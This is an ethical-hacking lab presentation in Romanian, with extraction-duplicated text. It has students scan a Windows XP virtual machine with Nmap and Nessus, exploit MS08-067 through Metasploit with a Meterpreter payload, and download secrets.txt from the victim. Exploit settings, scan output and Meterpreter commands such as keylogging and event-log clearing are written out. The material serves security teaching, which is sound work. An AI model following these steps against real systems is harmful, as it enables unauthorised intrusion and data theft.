Securitatea Retelelor de Securitatea Retelelor de CalculatoareCalculatoareLucrare de laboratorLucrare de laborator

Adrian Furtună

M.Sc. C|EH

adif2k8@gmail.com

Scopul lucrariiScopul lucrarii

Exemplificarea unui atac informatic folosind tool-Exemplificarea unui atac informatic folosind tool-uri open-source:uri open-source:Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima exploatand o vulnerabilitate a acesteia.exploatand o vulnerabilitate a acesteia.

Parcurgerea etapelor unui atac*:Parcurgerea etapelor unui atac*:1.1. RecunoastereRecunoastere --

2.2. Scanare si EnumerareScanare si Enumerare - Nmap, Nessus- Nmap, Nessus

3.3. Obtinerea accesuluiObtinerea accesului - Metasploit- Metasploit

4.4. Escalarea privilegiilorEscalarea privilegiilor - -

5.5. Mentinerea accesuluiMentinerea accesului --

6.6. Stergerea urmelor si instalarea de backdoorsStergerea urmelor si instalarea de backdoors --

* conform documentatiei pentru certificarea Certified Ethical Hacker (ECCouncil)

Pregatirea Laboratorului Pregatirea Laboratorului (30 min)(30 min)

Descarcati si instalati urmatoarele tool-uri:Descarcati si instalati urmatoarele tool-uri: nmap-5.00-setup.exe nmap-5.00-setup.exe ((http://nmap.org)) Nessus-4.0.2-i386.msi Nessus-4.0.2-i386.msi ((http://www.nessus.org)) framework-3.3.3.exe framework-3.3.3.exe ((http://www.metasploit.org))

Update Nessus pluginsUpdate Nessus plugins ““Obtain an activation code” (home feed)Obtain an activation code” (home feed) ““Register” (dupa inregistrare incepe automat update-ul plugin-urilor)Register” (dupa inregistrare incepe automat update-ul plugin-urilor)

Pregatirea victimei:Pregatirea victimei: Descarcati local si dezarhivati arhiva: Descarcati local si dezarhivati arhiva: winxp_SP2_strip.zipwinxp_SP2_strip.zip Porniti masina virtuala: Porniti masina virtuala: Windows XP Professional.vmxWindows XP Professional.vmx Autentificare: (user: Autentificare: (user: useruser, pass: , pass: useruser))

Verificare conectivitate (private network Host Verificare conectivitate (private network Host Guest):Guest): ping Host ping Host Guest Guest

DisclaimerDisclaimerEthical Hacking / Penetration TestingEthical Hacking / Penetration Testing

Actiuni similare unui atacator/hackerActiuni similare unui atacator/hacker Scop etic:Scop etic:

Descoperirea vulnerabilitatilor Descoperirea vulnerabilitatilor Propunerea de masuri corectivePropunerea de masuri corective Fara actiuni distructive/neaprobateFara actiuni distructive/neaprobate Activitate proactiva, preventivaActivitate proactiva, preventiva

Ce vom exersa… Ce vom exersa…

1.1. Scanare cu NmapScanare cu Nmap Porturi deschisePorturi deschise Versiunile serviciilor expuse Versiunile serviciilor expuse Versiunea sistemului de operareVersiunea sistemului de operare

2.2. Scanare cu NessusScanare cu Nessus Cautare automata de vulnerabilitati pentru Cautare automata de vulnerabilitati pentru

serviciile gasite anteriorserviciile gasite anterior

3.3. Exploatarea unei vulnerabilitati folosind MetasploitExploatarea unei vulnerabilitati folosind Metasploit Obtinerea accesului la sistemul tintaObtinerea accesului la sistemul tinta

Tinta atacului (victima)Tinta atacului (victima)

Sistem de operare: ?????Sistem de operare: ????? Servicii expuse: Servicii expuse: ?????????? Vulnerabilitati: Vulnerabilitati: ?????????? Masina virtuala (vmware)Masina virtuala (vmware) Firewall ON/OFFFirewall ON/OFF Fara antivirusFara antivirus

Scanare folosind Nmap (1)Scanare folosind Nmap (1)http://insecure.org http://insecure.org

nmap –h nmap –h [fragmente][fragmente]HOST DISCOVERY:HOST DISCOVERY: -sP: Ping Scan - go no further than determining if host is online-sP: Ping Scan - go no further than determining if host is online

-PN: Treat all hosts as online -- skip host discovery-PN: Treat all hosts as online -- skip host discovery -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -n/-R: Never do DNS resolution/Always resolve [default: sometimes]-n/-R: Never do DNS resolution/Always resolve [default: sometimes]SCAN TECHNIQUES:SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan-sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans-sN/sF/sX: TCP Null, FIN, and Xmas scansPORT SPECIFICATION AND SCAN ORDER:PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports-p <port ranges>: Only scan specified ports -F: Fast mode - Scan fewer ports than the default scan-F: Fast mode - Scan fewer ports than the default scanSERVICE/VERSION DETECTION:SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info-sV: Probe open ports to determine service/version infoSCRIPT SCAN:SCRIPT SCAN: -sC: equivalent to --script=default-sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script---script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-

categoriescategoriesOS DETECTION:OS DETECTION: -O: Enable OS detection-O: Enable OS detectionOUTPUT:OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to

the given filename.the given filename.

Scanare folosind Nmap (2)Scanare folosind Nmap (2) nmap -sS -sV -O -F -n 10.0.40.69nmap -sS -sV -O -F -n 10.0.40.69

Scanare folosind Nmap (2)Scanare folosind Nmap (2) nmap -sS -sV -O -F -n 10.0.40.69nmap -sS -sV -O -F -n 10.0.40.69Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard TimeStarting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time

Nmap scan report for 10.254.40.69Nmap scan report for 10.254.40.69

Host is up (0.00011s latency).Host is up (0.00011s latency).

Not shown: 98 filtered portsNot shown: 98 filtered ports

PORT STATE SERVICE VERSIONPORT STATE SERVICE VERSION

139/tcp open 139/tcp open netbios-ssnnetbios-ssn

445/tcp open445/tcp open microsoft-ds Microsoft Windows XP microsoft-dsmicrosoft-ds Microsoft Windows XP microsoft-ds

MAC Address: 00:0C:29:86:DF:91 (VMware)MAC Address: 00:0C:29:86:DF:91 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purposeDevice type: general purpose

Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)

Aggressive OS guesses: Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%)Windows 2000 SP4 (91%)

No exact OS matches for host (test conditions non-ideal).No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hopNetwork Distance: 1 hop

Service Info: OS: WindowsService Info: OS: Windows

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.52 secondsNmap done: 1 IP address (1 host up) scanned in 13.52 seconds

Scanare folosind Nessus (1)Scanare folosind Nessus (1)http://www.nessus.org http://www.nessus.org

Nessus Server Manager Nessus Server Manager Start Nessus Server Start Nessus Server

Nessus ClientNessus Client ConnectConnect - clientul se conecteaza la server- clientul se conecteaza la server + Networks to scan+ Networks to scan - se specifica IPul statiei tinta- se specifica IPul statiei tinta + Select a scan policy – se creaza o noua politica de scanare+ Select a scan policy – se creaza o noua politica de scanare

Plugin Selection Plugin Selection Disable All Disable All Plugin Selection Plugin Selection Windows (activeaza numai plugin-urile pentru Windows) Windows (activeaza numai plugin-urile pentru Windows)

Scan NowScan Now - incepe scanarea- incepe scanarea Export Export - salveaza raportul rezultat - salveaza raportul rezultat

Scanare folosind Nessus (2)Scanare folosind Nessus (2)http://www.nessus.org http://www.nessus.org

Obtinerea accesului – Metasploit (1)Obtinerea accesului – Metasploit (1)Arhitectura Metasploit

Metasploit Console, Metasploit WebMetasploit Console, Metasploit Web ModulesModules

Exploits - exploateaza o vulnerabilitate si livreaza un Exploits - exploateaza o vulnerabilitate si livreaza un payloadpayload Auxiliaries – port scanning, dos, fuzzing, etcAuxiliaries – port scanning, dos, fuzzing, etc Payloads - incapsuleaza cod arbitrar (shellcode) care Payloads - incapsuleaza cod arbitrar (shellcode) care este executat este executat

in urma unui exploitin urma unui exploit Nops – genereaza instructiuni de tip NOP cu Nops – genereaza instructiuni de tip NOP cu dimensiune arbitrara dimensiune arbitrara

Tutorial: Tutorial: http://www.offensive-security.com/metasploit-unleashed/http://www.offensive-security.com/metasploit-unleashed/

Obtinerea accesului – Metasploit (2)Obtinerea accesului – Metasploit (2)http://www.metasploit.org

Exploatam vulnerabilitatea ms08-067 (Conficker/Kido/Downadup) Exploatam vulnerabilitatea ms08-067 (Conficker/Kido/Downadup) http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Start Metasploit WebStart Metasploit Web

Exploits -> Search [ms08-067]Exploits -> Search [ms08-067]

Set TARGETSet TARGET - Windows XP SP2 English- Windows XP SP2 English

Set PAYLOAD Set PAYLOAD - windows/meterpreter/bind_tcp (sau reverse_tcp)- windows/meterpreter/bind_tcp (sau reverse_tcp)

Set OPTIONSSet OPTIONS - RHOST (adresa IP a victimei)- RHOST (adresa IP a victimei)

ExploitExploit

Obtinerea accesului – Metasploit (3)Obtinerea accesului – Metasploit (3)http://www.metasploit.org

Obtinerea accesului – Metasploit (4)Obtinerea accesului – Metasploit (4)http://www.metasploit.org

Stdapi: System Commands    Command       Description    -------       -----------    -------       -----------    clearev       Clear the event log    clearev       Clear the event log    execute       Execute a command    execute       Execute a command    kill          Terminate a process    kill          Terminate a process    ps            List running processes    ps            List running processes    reboot        Reboots the remote computer    reboot        Reboots the remote computer    shell         Drop into a system command shell    shell         Drop into a system command shell    sysinfo       Gets information about the remote    sysinfo       Gets information about the remote system, such as OSsystem, such as OS

Stdapi: User interface CommandsStdapi: User interface Commands    Command        Description    Command        Description    -------        -----------    -------        -----------    keyscan_dump   Dump they keystroke buffer    keyscan_dump   Dump they keystroke buffer    keyscan_start  Start capturing keystrokes    keyscan_start  Start capturing keystrokes    keyscan_stop   Stop capturing keystrokes    keyscan_stop   Stop capturing keystrokes

Meterpreter help [fragmente]Meterpreter help [fragmente]Stdapi: File system Commands

Command Description

------- ------------------ -----------

cat Read the contents of a file to the screencat Read the contents of a file to the screen

cd Change directorycd Change directory

del Delete the specified filedel Delete the specified file

download Download a file or directorydownload Download a file or directory

edit Edit a fileedit Edit a file

getlwd Print local working directorygetlwd Print local working directory

getwd Print working directorygetwd Print working directory

lcd Change local working directorylcd Change local working directory

lpwd Print local working directorylpwd Print local working directory

ls List filesls List files

mkdir Make directorymkdir Make directory

pwd Print working directorypwd Print working directory

rm Delete the specified filerm Delete the specified file

rmdir Remove directoryrmdir Remove directory

upload Upload a file or directoryupload Upload a file or directory

Indeplinirea obiectivului exercitiuluiIndeplinirea obiectivului exercitiului

Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima

exploatand o vulnerabilitate a acesteia..exploatand o vulnerabilitate a acesteia..

Meterpreter:Meterpreter:

pwdpwd

cd Desktopcd Desktop

lsls

download download

The EndThe End

Va multumesc!Va multumesc!

Adrian FurtunãAdrian FurtunãM.Sc. C|EHM.Sc. C|EHadif2k8@gmail.com adif2k8@gmail.com

? I N T R E B A R I ?? I N T R E B A R I ?